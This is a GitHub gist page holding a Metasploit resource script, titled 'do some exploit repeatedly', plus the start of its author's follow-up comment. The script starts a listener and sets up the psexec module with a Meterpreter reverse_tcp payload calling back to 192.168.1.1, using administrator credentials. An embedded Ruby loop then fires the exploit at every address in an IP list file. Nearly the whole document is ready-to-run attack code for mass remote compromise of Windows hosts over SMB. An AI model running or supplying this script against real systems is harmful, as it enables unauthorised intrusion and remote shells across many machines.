Last active
December 12, 2018 11:21
-
-
Save kernelsmith/5110923 to your computer and use it in GitHub Desktop.
do some exploit repeatedly
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This is really a .rc file, but to get pretty colors, we're calling it a .rb file | |
| # | |
| # setup handler | |
| # | |
| use multi/handler | |
| set LPORT 8080 | |
| set ExitOnSession false | |
| exploit -j | |
| # | |
| # prep exploit | |
| # | |
| use windows/smb/psexec | |
| set PAYLOAD windows/meterpreter/reverse_tcp | |
| set DisablePayloadHandler true | |
| set LPORT 8080 | |
| set LHOST 192.168.1.1 | |
| set SMBUser administrator | |
| set SMBPass lab | |
| # set SMBDomain -- let's assume the Domains are different, we'll them in our file | |
| # | |
| # read ip list then loop and run exploit on each | |
| # | |
| <ruby> | |
| # readlines will read the file into an array w/default line sep as the delim | |
| # readlines will also automatically close the File handle, so nothing to cleanup later | |
| line_array = File.readlines("/path/to/iplist.txt", "r") | |
| line_array.each do |line| | |
| ip, domain = line.split(',') | |
| run_single("set RHOST #{ip}") | |
| run_single("set SMBDomain #{domain}") if domain | |
| run_single("exploit -z") | |
| # in case the next iteration doesn't have a domain listed | |
| run_single("unset SMBDomain") | |
| end | |
| </ruby> |
Author
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
ausec, sorry I missed you on IRC. You can definitely replace the exploit w/an aux module, just add the appropriate settings and change run_single("exploit -z") to run_single("run -j") or whatever floats your boat. However, I believe this is entirely OBE cuz RHOSTS will take a file name now so just do: